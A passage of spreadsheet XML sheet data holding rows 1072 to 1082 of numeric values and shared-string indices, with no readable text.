      <c r="AB1072">
        <v>10</v>
      </c>
      <c r="AC1072">
        <v>600</v>
      </c>
      <c r="AD1072">
        <v>0</v>
      </c>
      <c r="AE1072">
        <v>1</v>
      </c>
      <c r="AF1072" t="s">
        <v>8117</v>
      </c>
      <c r="AG1072">
        <v>30253</v>
      </c>
      <c r="AH1072">
        <v>9</v>
      </c>
      <c r="AJ1072">
        <v>112</v>
      </c>
      <c r="AK1072" t="s">
        <v>8118</v>
      </c>
      <c r="AL1072" t="s">
        <v>8119</v>
      </c>
      <c r="AM1072" t="s">
        <v>8120</v>
      </c>
      <c r="AN1072" t="s">
        <v>68</v>
      </c>
      <c r="AO1072">
        <v>2015</v>
      </c>
      <c r="AP1072">
        <v>81994970044</v>
      </c>
      <c r="AQ1072">
        <v>85927956627</v>
      </c>
      <c r="AR1072" t="s">
        <v>8117</v>
      </c>
      <c r="AS1072" t="s">
        <v>71</v>
      </c>
      <c r="AT1072" t="s">
        <v>72</v>
      </c>
      <c r="AU1072">
        <v>28</v>
      </c>
      <c r="AV1072">
        <v>1</v>
      </c>
      <c r="AW1072">
        <v>0</v>
      </c>
      <c r="AX1072">
        <v>0</v>
      </c>
      <c r="AY1072">
        <v>0</v>
      </c>
      <c r="AZ1072">
        <v>3</v>
      </c>
      <c r="BA1072" t="s">
        <v>17588</v>
      </c>
      <c r="BB1072">
        <v>0</v>
      </c>
      <c r="BC1072" t="s">
        <v>12608</v>
      </c>
      <c r="BD1072">
        <v>0</v>
      </c>
    </row>
    <row r="1073" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1073">
        <v>5117</v>
      </c>
      <c r="B1073" t="s">
        <v>8121</v>
      </c>
      <c r="C1073" t="s">
        <v>99</v>
      </c>
      <c r="D1073" t="s">
        <v>8122</v>
      </c>
      <c r="E1073" t="s">
        <v>363</v>
      </c>
      <c r="F1073" t="s">
        <v>8123</v>
      </c>
      <c r="G1073" s="1">
        <v>44176</v>
      </c>
      <c r="H1073">
        <v>7514</v>
      </c>
      <c r="I1073">
        <v>7514</v>
      </c>
      <c r="J1073">
        <v>0</v>
      </c>
      <c r="K1073">
        <v>1</v>
      </c>
      <c r="L1073">
        <v>0</v>
      </c>
      <c r="M1073">
        <v>0</v>
      </c>
      <c r="N1073">
        <v>0</v>
      </c>
      <c r="O1073">
        <v>0</v>
      </c>
      <c r="P1073">
        <v>0</v>
      </c>
      <c r="Q1073">
        <v>0</v>
      </c>
      <c r="R1073">
        <v>0</v>
      </c>
      <c r="S1073">
        <v>0</v>
      </c>
      <c r="T1073">
        <v>1</v>
      </c>
      <c r="U1073">
        <v>0</v>
      </c>
      <c r="V1073">
        <v>35000</v>
      </c>
      <c r="W1073">
        <v>0</v>
      </c>
      <c r="X1073">
        <v>0</v>
      </c>
      <c r="Y1073">
        <v>0</v>
      </c>
      <c r="Z1073">
        <v>0</v>
      </c>
      <c r="AA1073">
        <v>0</v>
      </c>
      <c r="AB1073">
        <v>0</v>
      </c>
      <c r="AC1073">
        <v>0</v>
      </c>
      <c r="AD1073">
        <v>0</v>
      </c>
      <c r="AE1073">
        <v>5000</v>
      </c>
      <c r="AF1073" t="s">
        <v>8124</v>
      </c>
      <c r="AG1073">
        <v>11720</v>
      </c>
      <c r="AH1073">
        <v>12</v>
      </c>
      <c r="AJ1073">
        <v>159</v>
      </c>
      <c r="AK1073" t="s">
        <v>405</v>
      </c>
      <c r="AL1073" t="s">
        <v>766</v>
      </c>
      <c r="AM1073" t="s">
        <v>8125</v>
      </c>
      <c r="AN1073" t="s">
        <v>55</v>
      </c>
      <c r="AO1073">
        <v>2020</v>
      </c>
      <c r="AP1073">
        <v>81314652351</v>
      </c>
      <c r="AQ1073" t="s">
        <v>8126</v>
      </c>
      <c r="AR1073" t="s">
        <v>8124</v>
      </c>
      <c r="AS1073" t="s">
        <v>71</v>
      </c>
      <c r="AT1073" t="s">
        <v>58</v>
      </c>
      <c r="AU1073">
        <v>25</v>
      </c>
      <c r="AV1073">
        <v>0</v>
      </c>
      <c r="AW1073">
        <v>0</v>
      </c>
      <c r="AX1073">
        <v>0</v>
      </c>
      <c r="AY1073">
        <v>4</v>
      </c>
      <c r="AZ1073">
        <v>1</v>
      </c>
      <c r="BA1073" t="s">
        <v>17594</v>
      </c>
      <c r="BB1073">
        <v>0</v>
      </c>
      <c r="BC1073">
        <v>0</v>
      </c>
      <c r="BD1073" t="s">
        <v>10103</v>
      </c>
    </row>
    <row r="1074" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1074">
        <v>5131</v>
      </c>
      <c r="B1074" t="s">
        <v>8127</v>
      </c>
      <c r="C1074" t="s">
        <v>88</v>
      </c>
      <c r="D1074" t="s">
        <v>8128</v>
      </c>
      <c r="E1074" t="s">
        <v>142</v>
      </c>
      <c r="F1074" t="s">
        <v>151</v>
      </c>
      <c r="G1074" s="1">
        <v>44232</v>
      </c>
      <c r="H1074">
        <v>7522</v>
      </c>
      <c r="I1074">
        <v>7522</v>
      </c>
      <c r="J1074">
        <v>2</v>
      </c>
      <c r="K1074">
        <v>0</v>
      </c>
      <c r="L1074">
        <v>0</v>
      </c>
      <c r="M1074">
        <v>0</v>
      </c>
      <c r="N1074">
        <v>0</v>
      </c>
      <c r="O1074">
        <v>0</v>
      </c>
      <c r="P1074">
        <v>0</v>
      </c>
      <c r="Q1074">
        <v>0</v>
      </c>
      <c r="R1074">
        <v>0</v>
      </c>
      <c r="S1074">
        <v>0</v>
      </c>
      <c r="T1074">
        <v>0</v>
      </c>
      <c r="U1074">
        <v>100000</v>
      </c>
      <c r="V1074">
        <v>0</v>
      </c>
      <c r="W1074">
        <v>0</v>
      </c>
      <c r="X1074">
        <v>0</v>
      </c>
      <c r="Y1074">
        <v>0</v>
      </c>
      <c r="Z1074">
        <v>0</v>
      </c>
      <c r="AA1074">
        <v>0</v>
      </c>
      <c r="AB1074">
        <v>0</v>
      </c>
      <c r="AC1074">
        <v>0</v>
      </c>
      <c r="AD1074">
        <v>0</v>
      </c>
      <c r="AE1074">
        <v>0</v>
      </c>
      <c r="AF1074" t="s">
        <v>8129</v>
      </c>
      <c r="AG1074">
        <v>80222</v>
      </c>
      <c r="AH1074">
        <v>17</v>
      </c>
      <c r="AJ1074">
        <v>282</v>
      </c>
      <c r="AK1074" t="s">
        <v>592</v>
      </c>
      <c r="AL1074" t="s">
        <v>593</v>
      </c>
      <c r="AM1074" t="s">
        <v>8130</v>
      </c>
      <c r="AN1074" t="s">
        <v>55</v>
      </c>
      <c r="AO1074">
        <v>2014</v>
      </c>
      <c r="AP1074">
        <v>81228556686</v>
      </c>
      <c r="AQ1074" t="s">
        <v>8131</v>
      </c>
      <c r="AR1074" t="s">
        <v>8129</v>
      </c>
      <c r="AS1074" t="s">
        <v>179</v>
      </c>
      <c r="AT1074" t="s">
        <v>58</v>
      </c>
      <c r="AU1074">
        <v>26</v>
      </c>
      <c r="AV1074">
        <v>0</v>
      </c>
      <c r="AW1074">
        <v>0</v>
      </c>
      <c r="AX1074">
        <v>0</v>
      </c>
      <c r="AY1074">
        <v>47</v>
      </c>
      <c r="AZ1074">
        <v>6</v>
      </c>
      <c r="BA1074" t="s">
        <v>17601</v>
      </c>
      <c r="BB1074">
        <v>0</v>
      </c>
      <c r="BC1074" t="s">
        <v>9550</v>
      </c>
      <c r="BD1074" t="s">
        <v>10040</v>
      </c>
    </row>
    <row r="1075" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1075">
        <v>5123</v>
      </c>
      <c r="B1075" t="s">
        <v>5899</v>
      </c>
      <c r="C1075" t="s">
        <v>2060</v>
      </c>
      <c r="D1075" t="s">
        <v>5900</v>
      </c>
      <c r="E1075" t="s">
        <v>142</v>
      </c>
      <c r="F1075" t="s">
        <v>3763</v>
      </c>
      <c r="G1075" s="1">
        <v>44160</v>
      </c>
      <c r="H1075">
        <v>7533</v>
      </c>
      <c r="I1075">
        <v>7533</v>
      </c>
      <c r="J1075">
        <v>1</v>
      </c>
      <c r="K1075">
        <v>0</v>
      </c>
      <c r="L1075">
        <v>1</v>
      </c>
      <c r="M1075">
        <v>0</v>
      </c>
      <c r="N1075">
        <v>0</v>
      </c>
      <c r="O1075">
        <v>0</v>
      </c>
      <c r="P1075">
        <v>0</v>
      </c>
      <c r="Q1075">
        <v>5</v>
      </c>
      <c r="R1075">
        <v>0</v>
      </c>
      <c r="S1075">
        <v>1</v>
      </c>
      <c r="T1075">
        <v>2</v>
      </c>
      <c r="U1075">
        <v>1000</v>
      </c>
      <c r="V1075">
        <v>0</v>
      </c>
      <c r="W1075">
        <v>5000</v>
      </c>
      <c r="X1075">
        <v>0</v>
      </c>
      <c r="Y1075">
        <v>0</v>
      </c>
      <c r="Z1075">
        <v>0</v>
      </c>
      <c r="AA1075">
        <v>0</v>
      </c>
      <c r="AB1075">
        <v>350</v>
      </c>
      <c r="AC1075">
        <v>0</v>
      </c>
      <c r="AD1075">
        <v>1</v>
      </c>
      <c r="AE1075">
        <v>0</v>
      </c>
      <c r="AF1075" t="s">
        <v>5902</v>
      </c>
      <c r="AG1075">
        <v>96117</v>
      </c>
      <c r="AH1075">
        <v>25</v>
      </c>
      <c r="AJ1075">
        <v>445</v>
      </c>
      <c r="AK1075" t="s">
        <v>6663</v>
      </c>
      <c r="AL1075" t="s">
        <v>5904</v>
      </c>
      <c r="AM1075" t="s">
        <v>8132</v>
      </c>
      <c r="AN1075" t="s">
        <v>68</v>
      </c>
      <c r="AO1075">
        <v>2017</v>
      </c>
      <c r="AP1075">
        <v>8124464481</v>
      </c>
      <c r="AQ1075" t="s">
        <v>8133</v>
      </c>
      <c r="AR1075" t="s">
        <v>8134</v>
      </c>
      <c r="AS1075" t="s">
        <v>71</v>
      </c>
      <c r="AT1075" t="s">
        <v>58</v>
      </c>
      <c r="AU1075">
        <v>22</v>
      </c>
      <c r="AV1075">
        <v>0</v>
      </c>
      <c r="AW1075">
        <v>14</v>
      </c>
      <c r="AX1075">
        <v>12</v>
      </c>
      <c r="AY1075">
        <v>5</v>
      </c>
      <c r="AZ1075">
        <v>3</v>
      </c>
      <c r="BA1075" t="s">
        <v>17265</v>
      </c>
      <c r="BB1075" t="s">
        <v>15903</v>
      </c>
      <c r="BC1075" t="s">
        <v>9550</v>
      </c>
      <c r="BD1075" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1076" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1076">
        <v>5145</v>
      </c>
      <c r="B1076" t="s">
        <v>8135</v>
      </c>
      <c r="C1076" t="s">
        <v>157</v>
      </c>
      <c r="D1076" t="s">
        <v>8136</v>
      </c>
      <c r="E1076" t="s">
        <v>142</v>
      </c>
      <c r="F1076" t="s">
        <v>4614</v>
      </c>
      <c r="G1076" s="1">
        <v>44194</v>
      </c>
      <c r="H1076">
        <v>7538</v>
      </c>
      <c r="I1076">
        <v>7538</v>
      </c>
      <c r="J1076">
        <v>2</v>
      </c>
      <c r="K1076">
        <v>0</v>
      </c>
      <c r="L1076">
        <v>0</v>
      </c>
      <c r="M1076">
        <v>0</v>
      </c>
      <c r="N1076">
        <v>0</v>
      </c>
      <c r="O1076">
        <v>0</v>
      </c>
      <c r="P1076">
        <v>0</v>
      </c>
      <c r="Q1076">
        <v>0</v>
      </c>
      <c r="R1076">
        <v>0</v>
      </c>
      <c r="S1076">
        <v>0</v>
      </c>
      <c r="T1076">
        <v>0</v>
      </c>
      <c r="U1076">
        <v>600</v>
      </c>
      <c r="V1076">
        <v>0</v>
      </c>
      <c r="W1076">
        <v>0</v>
      </c>
      <c r="X1076">
        <v>0</v>
      </c>
      <c r="Y1076">
        <v>0</v>
      </c>
      <c r="Z1076">
        <v>0</v>
      </c>
      <c r="AA1076">
        <v>0</v>
      </c>
      <c r="AB1076">
        <v>0</v>
      </c>
      <c r="AC1076">
        <v>0</v>
      </c>
      <c r="AD1076">
        <v>0</v>
      </c>
      <c r="AE1076">
        <v>0</v>
      </c>
      <c r="AF1076" t="s">
        <v>8137</v>
      </c>
      <c r="AG1076">
        <v>60186</v>
      </c>
      <c r="AH1076">
        <v>16</v>
      </c>
      <c r="AJ1076">
        <v>264</v>
      </c>
      <c r="AK1076" t="s">
        <v>2543</v>
      </c>
      <c r="AL1076" t="s">
        <v>7041</v>
      </c>
      <c r="AM1076" t="s">
        <v>8138</v>
      </c>
      <c r="AN1076" t="s">
        <v>55</v>
      </c>
      <c r="AO1076">
        <v>2018</v>
      </c>
      <c r="AP1076">
        <v>81230030047</v>
      </c>
      <c r="AQ1076">
        <v>81230030047</v>
      </c>
      <c r="AR1076" t="s">
        <v>8137</v>
      </c>
      <c r="AS1076" t="s">
        <v>71</v>
      </c>
      <c r="AT1076" t="s">
        <v>58</v>
      </c>
      <c r="AU1076">
        <v>1</v>
      </c>
      <c r="AV1076">
        <v>1</v>
      </c>
      <c r="AW1076">
        <v>15</v>
      </c>
      <c r="AX1076">
        <v>15</v>
      </c>
      <c r="AY1076">
        <v>4</v>
      </c>
      <c r="AZ1076">
        <v>0</v>
      </c>
      <c r="BA1076" t="s">
        <v>17167</v>
      </c>
      <c r="BB1076">
        <v>0</v>
      </c>
      <c r="BC1076" t="s">
        <v>12552</v>
      </c>
      <c r="BD1076" t="s">
        <v>11937</v>
      </c>
    </row>
    <row r="1077" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1077">
        <v>5116</v>
      </c>
      <c r="B1077" t="s">
        <v>8139</v>
      </c>
      <c r="C1077" t="s">
        <v>157</v>
      </c>
      <c r="D1077" t="s">
        <v>8140</v>
      </c>
      <c r="E1077" t="s">
        <v>142</v>
      </c>
      <c r="F1077" t="s">
        <v>8141</v>
      </c>
      <c r="G1077" s="1">
        <v>44334</v>
      </c>
      <c r="H1077">
        <v>7546</v>
      </c>
      <c r="I1077">
        <v>7546</v>
      </c>
      <c r="J1077">
        <v>1</v>
      </c>
      <c r="K1077">
        <v>1</v>
      </c>
      <c r="L1077">
        <v>2</v>
      </c>
      <c r="M1077">
        <v>0</v>
      </c>
      <c r="N1077">
        <v>0</v>
      </c>
      <c r="O1077">
        <v>0</v>
      </c>
      <c r="P1077">
        <v>0</v>
      </c>
      <c r="Q1077">
        <v>0</v>
      </c>
      <c r="R1077">
        <v>0</v>
      </c>
      <c r="S1077">
        <v>0</v>
      </c>
      <c r="T1077">
        <v>1</v>
      </c>
      <c r="U1077">
        <v>377000</v>
      </c>
      <c r="V1077">
        <v>25000</v>
      </c>
      <c r="W1077">
        <v>7000</v>
      </c>
      <c r="X1077">
        <v>0</v>
      </c>
      <c r="Y1077">
        <v>0</v>
      </c>
      <c r="Z1077">
        <v>0</v>
      </c>
      <c r="AA1077">
        <v>0</v>
      </c>
      <c r="AB1077">
        <v>0</v>
      </c>
      <c r="AC1077">
        <v>0</v>
      </c>
      <c r="AD1077">
        <v>0</v>
      </c>
      <c r="AE1077">
        <v>500000</v>
      </c>
      <c r="AF1077" t="s">
        <v>8142</v>
      </c>
      <c r="AG1077">
        <v>67155</v>
      </c>
      <c r="AH1077">
        <v>16</v>
      </c>
      <c r="AJ1077">
        <v>241</v>
      </c>
      <c r="AK1077" t="s">
        <v>1231</v>
      </c>
      <c r="AL1077" t="s">
        <v>8143</v>
      </c>
      <c r="AM1077" t="s">
        <v>8144</v>
      </c>
      <c r="AN1077" t="s">
        <v>55</v>
      </c>
      <c r="AO1077">
        <v>2005</v>
      </c>
      <c r="AP1077">
        <v>343639710</v>
      </c>
      <c r="AQ1077" t="s">
        <v>8145</v>
      </c>
      <c r="AR1077" t="s">
        <v>8146</v>
      </c>
      <c r="AS1077" t="s">
        <v>71</v>
      </c>
      <c r="AT1077" t="s">
        <v>58</v>
      </c>
      <c r="AU1077">
        <v>26</v>
      </c>
      <c r="AV1077">
        <v>3</v>
      </c>
      <c r="AW1077">
        <v>10</v>
      </c>
      <c r="AX1077">
        <v>4</v>
      </c>
      <c r="AY1077">
        <v>4</v>
      </c>
      <c r="AZ1077">
        <v>3</v>
      </c>
      <c r="BA1077" t="s">
        <v>17592</v>
      </c>
      <c r="BB1077">
        <v>0</v>
      </c>
      <c r="BC1077" t="s">
        <v>12549</v>
      </c>
      <c r="BD1077">
        <v>0</v>
      </c>
    </row>
    <row r="1078" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1078">
        <v>5136</v>
      </c>
      <c r="B1078" t="s">
        <v>8147</v>
      </c>
      <c r="C1078" t="s">
        <v>157</v>
      </c>
      <c r="D1078" t="s">
        <v>8148</v>
      </c>
      <c r="E1078" t="s">
        <v>49</v>
      </c>
      <c r="F1078" t="s">
        <v>8149</v>
      </c>
      <c r="G1078" s="1">
        <v>44379</v>
      </c>
      <c r="H1078">
        <v>7556</v>
      </c>
      <c r="I1078">
        <v>7556</v>
      </c>
      <c r="J1078">
        <v>0</v>
      </c>
      <c r="K1078">
        <v>0</v>
      </c>
      <c r="L1078">
        <v>0</v>
      </c>
      <c r="M1078">
        <v>2</v>
      </c>
      <c r="N1078">
        <v>0</v>
      </c>
      <c r="O1078">
        <v>0</v>
      </c>
      <c r="P1078">
        <v>0</v>
      </c>
      <c r="Q1078">
        <v>4</v>
      </c>
      <c r="R1078">
        <v>0</v>
      </c>
      <c r="S1078">
        <v>0</v>
      </c>
      <c r="T1078">
        <v>1</v>
      </c>
      <c r="U1078">
        <v>0</v>
      </c>
      <c r="V1078">
        <v>0</v>
      </c>
      <c r="W1078">
        <v>0</v>
      </c>
      <c r="X1078">
        <v>200</v>
      </c>
      <c r="Y1078">
        <v>0</v>
      </c>
      <c r="Z1078">
        <v>0</v>
      </c>
      <c r="AA1078">
        <v>0</v>
      </c>
      <c r="AB1078">
        <v>200</v>
      </c>
      <c r="AC1078">
        <v>0</v>
      </c>
      <c r="AD1078">
        <v>0</v>
      </c>
      <c r="AE1078">
        <v>200</v>
      </c>
      <c r="AF1078" t="s">
        <v>8150</v>
      </c>
      <c r="AG1078">
        <v>66314</v>
      </c>
      <c r="AH1078">
        <v>16</v>
      </c>
      <c r="AJ1078">
        <v>230</v>
      </c>
      <c r="AK1078" t="s">
        <v>8151</v>
      </c>
      <c r="AL1078" t="s">
        <v>8152</v>
      </c>
      <c r="AM1078" t="s">
        <v>8153</v>
      </c>
      <c r="AN1078" t="s">
        <v>68</v>
      </c>
      <c r="AO1078">
        <v>2016</v>
      </c>
      <c r="AP1078">
        <v>81254460020</v>
      </c>
      <c r="AQ1078" t="s">
        <v>8154</v>
      </c>
      <c r="AR1078" t="s">
        <v>8150</v>
      </c>
      <c r="AS1078" t="s">
        <v>71</v>
      </c>
      <c r="AT1078" t="s">
        <v>72</v>
      </c>
      <c r="AU1078">
        <v>6</v>
      </c>
      <c r="AV1078">
        <v>1</v>
      </c>
      <c r="AW1078">
        <v>1</v>
      </c>
      <c r="AX1078">
        <v>2</v>
      </c>
      <c r="AY1078">
        <v>3</v>
      </c>
      <c r="AZ1078">
        <v>7</v>
      </c>
      <c r="BA1078" t="s">
        <v>17602</v>
      </c>
      <c r="BB1078" t="s">
        <v>17604</v>
      </c>
      <c r="BC1078" t="s">
        <v>12581</v>
      </c>
      <c r="BD1078">
        <v>0</v>
      </c>
    </row>
    <row r="1079" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1079">
        <v>5115</v>
      </c>
      <c r="B1079" t="s">
        <v>8155</v>
      </c>
      <c r="C1079" t="s">
        <v>318</v>
      </c>
      <c r="D1079" t="s">
        <v>8156</v>
      </c>
      <c r="E1079" t="s">
        <v>809</v>
      </c>
      <c r="F1079" t="s">
        <v>3574</v>
      </c>
      <c r="G1079" s="1">
        <v>44327</v>
      </c>
      <c r="H1079">
        <v>7572</v>
      </c>
      <c r="I1079">
        <v>7572</v>
      </c>
      <c r="J1079">
        <v>1</v>
      </c>
      <c r="K1079">
        <v>0</v>
      </c>
      <c r="L1079">
        <v>0</v>
      </c>
      <c r="M1079">
        <v>0</v>
      </c>
      <c r="N1079">
        <v>0</v>
      </c>
      <c r="O1079">
        <v>0</v>
      </c>
      <c r="P1079">
        <v>0</v>
      </c>
      <c r="Q1079">
        <v>6</v>
      </c>
      <c r="R1079">
        <v>6</v>
      </c>
      <c r="S1079">
        <v>0</v>
      </c>
      <c r="T1079">
        <v>1</v>
      </c>
      <c r="U1079">
        <v>0</v>
      </c>
      <c r="V1079">
        <v>0</v>
      </c>
      <c r="W1079">
        <v>0</v>
      </c>
      <c r="X1079">
        <v>0</v>
      </c>
      <c r="Y1079">
        <v>0</v>
      </c>
      <c r="Z1079">
        <v>0</v>
      </c>
      <c r="AA1079">
        <v>0</v>
      </c>
      <c r="AB1079">
        <v>300</v>
      </c>
      <c r="AC1079">
        <v>300</v>
      </c>
      <c r="AD1079">
        <v>0</v>
      </c>
      <c r="AE1079">
        <v>5000</v>
      </c>
      <c r="AF1079" t="s">
        <v>8157</v>
      </c>
      <c r="AG1079">
        <v>90224</v>
      </c>
      <c r="AH1079">
        <v>26</v>
      </c>
      <c r="AJ1079">
        <v>420</v>
      </c>
      <c r="AK1079" t="s">
        <v>5889</v>
      </c>
      <c r="AL1079" t="s">
        <v>8158</v>
      </c>
      <c r="AM1079" t="s">
        <v>8159</v>
      </c>
      <c r="AN1079" t="s">
        <v>68</v>
      </c>
      <c r="AO1079">
        <v>2015</v>
      </c>
      <c r="AP1079" t="s">
        <v>8160</v>
      </c>
      <c r="AQ1079" t="s">
        <v>8161</v>
      </c>
      <c r="AR1079" t="s">
        <v>8157</v>
      </c>
      <c r="AS1079" t="s">
        <v>71</v>
      </c>
      <c r="AT1079" t="s">
        <v>58</v>
      </c>
      <c r="AU1079">
        <v>26</v>
      </c>
      <c r="AV1079">
        <v>0</v>
      </c>
      <c r="AW1079">
        <v>1</v>
      </c>
      <c r="AX1079">
        <v>1</v>
      </c>
      <c r="AY1079">
        <v>2</v>
      </c>
      <c r="AZ1079">
        <v>2</v>
      </c>
      <c r="BA1079" t="s">
        <v>17591</v>
      </c>
      <c r="BB1079" t="s">
        <v>16092</v>
      </c>
      <c r="BC1079" t="s">
        <v>13579</v>
      </c>
      <c r="BD1079" t="s">
        <v>13580</v>
      </c>
    </row>
    <row r="1080" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1080">
        <v>5161</v>
      </c>
      <c r="B1080" t="s">
        <v>8162</v>
      </c>
      <c r="C1080" t="s">
        <v>157</v>
      </c>
      <c r="D1080" t="s">
        <v>8163</v>
      </c>
      <c r="E1080" t="s">
        <v>142</v>
      </c>
      <c r="F1080" t="s">
        <v>143</v>
      </c>
      <c r="G1080" s="1">
        <v>44232</v>
      </c>
      <c r="H1080">
        <v>7613</v>
      </c>
      <c r="I1080">
        <v>7613</v>
      </c>
      <c r="J1080">
        <v>0</v>
      </c>
      <c r="K1080">
        <v>0</v>
      </c>
      <c r="L1080">
        <v>0</v>
      </c>
      <c r="M1080">
        <v>4</v>
      </c>
      <c r="N1080">
        <v>0</v>
      </c>
      <c r="O1080">
        <v>0</v>
      </c>
      <c r="P1080">
        <v>0</v>
      </c>
      <c r="Q1080">
        <v>0</v>
      </c>
      <c r="R1080">
        <v>0</v>
      </c>
      <c r="S1080">
        <v>0</v>
      </c>
      <c r="T1080">
        <v>1</v>
      </c>
      <c r="U1080">
        <v>0</v>
      </c>
      <c r="V1080">
        <v>0</v>
      </c>
      <c r="W1080">
        <v>0</v>
      </c>
      <c r="X1080">
        <v>1200</v>
      </c>
      <c r="Y1080">
        <v>0</v>
      </c>
      <c r="Z1080">
        <v>0</v>
      </c>
      <c r="AA1080">
        <v>0</v>
      </c>
      <c r="AB1080">
        <v>0</v>
      </c>
      <c r="AC1080">
        <v>0</v>
      </c>
      <c r="AD1080">
        <v>0</v>
      </c>
      <c r="AE1080">
        <v>200</v>
      </c>
      <c r="AF1080" t="s">
        <v>8164</v>
      </c>
      <c r="AG1080">
        <v>65138</v>
      </c>
      <c r="AH1080">
        <v>16</v>
      </c>
      <c r="AJ1080">
        <v>259</v>
      </c>
      <c r="AK1080" t="s">
        <v>8165</v>
      </c>
      <c r="AL1080" t="s">
        <v>8166</v>
      </c>
      <c r="AM1080" t="s">
        <v>8167</v>
      </c>
      <c r="AN1080" t="s">
        <v>68</v>
      </c>
      <c r="AO1080">
        <v>2014</v>
      </c>
      <c r="AP1080">
        <v>81233804620</v>
      </c>
      <c r="AQ1080" t="s">
        <v>8168</v>
      </c>
      <c r="AR1080" t="s">
        <v>8169</v>
      </c>
      <c r="AS1080" t="s">
        <v>71</v>
      </c>
      <c r="AT1080" t="s">
        <v>72</v>
      </c>
      <c r="AU1080">
        <v>25</v>
      </c>
      <c r="AV1080">
        <v>1</v>
      </c>
      <c r="AW1080">
        <v>0</v>
      </c>
      <c r="AX1080">
        <v>7</v>
      </c>
      <c r="AY1080">
        <v>4</v>
      </c>
      <c r="AZ1080">
        <v>5</v>
      </c>
      <c r="BA1080" t="s">
        <v>17609</v>
      </c>
      <c r="BB1080">
        <v>0</v>
      </c>
      <c r="BC1080" t="s">
        <v>12595</v>
      </c>
      <c r="BD1080">
        <v>0</v>
      </c>
    </row>
    <row r="1081" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1081">
        <v>5126</v>
      </c>
      <c r="B1081" t="s">
        <v>8170</v>
      </c>
      <c r="C1081" t="s">
        <v>99</v>
      </c>
      <c r="D1081" t="s">
        <v>8171</v>
      </c>
      <c r="E1081" t="s">
        <v>142</v>
      </c>
      <c r="F1081" t="s">
        <v>8172</v>
      </c>
      <c r="G1081" s="1">
        <v>44274</v>
      </c>
      <c r="H1081">
        <v>7621</v>
      </c>
      <c r="I1081">
        <v>7621</v>
      </c>
      <c r="J1081">
        <v>1</v>
      </c>
      <c r="K1081">
        <v>0</v>
      </c>
      <c r="L1081">
        <v>0</v>
      </c>
      <c r="M1081">
        <v>0</v>
      </c>
      <c r="N1081">
        <v>0</v>
      </c>
      <c r="O1081">
        <v>0</v>
      </c>
      <c r="P1081">
        <v>0</v>
      </c>
      <c r="Q1081">
        <v>0</v>
      </c>
      <c r="R1081">
        <v>0</v>
      </c>
      <c r="S1081">
        <v>1</v>
      </c>
      <c r="T1081">
        <v>0</v>
      </c>
      <c r="U1081">
        <v>700</v>
      </c>
      <c r="V1081">
        <v>0</v>
      </c>
      <c r="W1081">
        <v>0</v>
      </c>
      <c r="X1081">
        <v>0</v>
      </c>
      <c r="Y1081">
        <v>0</v>
      </c>
      <c r="Z1081">
        <v>0</v>
      </c>
      <c r="AA1081">
        <v>0</v>
      </c>
      <c r="AB1081">
        <v>0</v>
      </c>
      <c r="AC1081">
        <v>0</v>
      </c>
      <c r="AD1081">
        <v>1</v>
      </c>
      <c r="AE1081">
        <v>0</v>
      </c>
      <c r="AF1081" t="s">
        <v>8173</v>
      </c>
      <c r="AG1081">
        <v>14440</v>
      </c>
      <c r="AH1081">
        <v>12</v>
      </c>
      <c r="AJ1081">
        <v>160</v>
      </c>
      <c r="AK1081" t="s">
        <v>114</v>
      </c>
      <c r="AL1081" t="s">
        <v>114</v>
      </c>
      <c r="AM1081" t="s">
        <v>8174</v>
      </c>
      <c r="AN1081" t="s">
        <v>55</v>
      </c>
      <c r="AO1081">
        <v>2019</v>
      </c>
      <c r="AP1081" t="s">
        <v>623</v>
      </c>
      <c r="AQ1081" t="s">
        <v>8175</v>
      </c>
      <c r="AR1081" t="s">
        <v>8173</v>
      </c>
      <c r="AS1081" t="s">
        <v>179</v>
      </c>
      <c r="AT1081" t="s">
        <v>58</v>
      </c>
      <c r="AU1081">
        <v>24</v>
      </c>
      <c r="AV1081">
        <v>1</v>
      </c>
      <c r="AW1081">
        <v>10</v>
      </c>
      <c r="AX1081">
        <v>0</v>
      </c>
      <c r="AY1081">
        <v>5</v>
      </c>
      <c r="AZ1081">
        <v>2</v>
      </c>
      <c r="BA1081" t="s">
        <v>17600</v>
      </c>
      <c r="BB1081">
        <v>0</v>
      </c>
      <c r="BC1081" t="s">
        <v>12601</v>
      </c>
      <c r="BD1081">
        <v>0</v>
      </c>
    </row>
    <row r="1082" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1082">
        <v>5118</v>
      </c>
      <c r="B1082" t="s">
        <v>8176</v>
      </c>
      <c r="C1082" t="s">
        <v>607</v>
      </c>
      <c r="D1082" t="s">
        <v>8177</v>
      </c>
      <c r="E1082" t="s">
        <v>142</v>
      </c>
      <c r="F1082" t="s">
        <v>666</v>
      </c>
      <c r="G1082" s="1">
        <v>44259</v>
      </c>
      <c r="H1082">
        <v>7632</v>
      </c>
      <c r="I1082">
        <v>7632</v>
      </c>
      <c r="J1082">
        <v>1</v>
      </c>
      <c r="K1082">
        <v>1</v>
      </c>
      <c r="L1082">
        <v>0</v>
      </c>
      <c r="M1082">
        <v>0</v>
      </c>
      <c r="N1082">
        <v>0</v>
      </c>
      <c r="O1082">
        <v>0</v>
      </c>
      <c r="P1082">
        <v>0</v>
      </c>
      <c r="Q1082">
        <v>0</v>
      </c>
      <c r="R1082">
        <v>0</v>
      </c>
      <c r="S1082">
        <v>0</v>
      </c>
      <c r="T1082">
        <v>1</v>
      </c>
      <c r="U1082">
        <v>15000</v>
      </c>
      <c r="V1082">
        <v>15000</v>
      </c>
      <c r="W1082">
        <v>0</v>
      </c>
      <c r="X1082">
        <v>0</v>
      </c>
      <c r="Y1082">
        <v>0</v>
      </c>
      <c r="Z1082">
        <v>0</v>
      </c>
      <c r="AA1082">
        <v>0</v>
      </c>
      <c r="AB1082">
        <v>0</v>
      </c>
      <c r="AC1082">
        <v>0</v>
      </c>
      <c r="AD1082">
        <v>0</v>
      </c>
      <c r="AE1082">
        <v>15000</v>
      </c>
      <c r="AF1082" t="s">
        <v>8178</v>
      </c>
      <c r="AG1082">
        <v>77482</v>
      </c>
      <c r="AH1082">
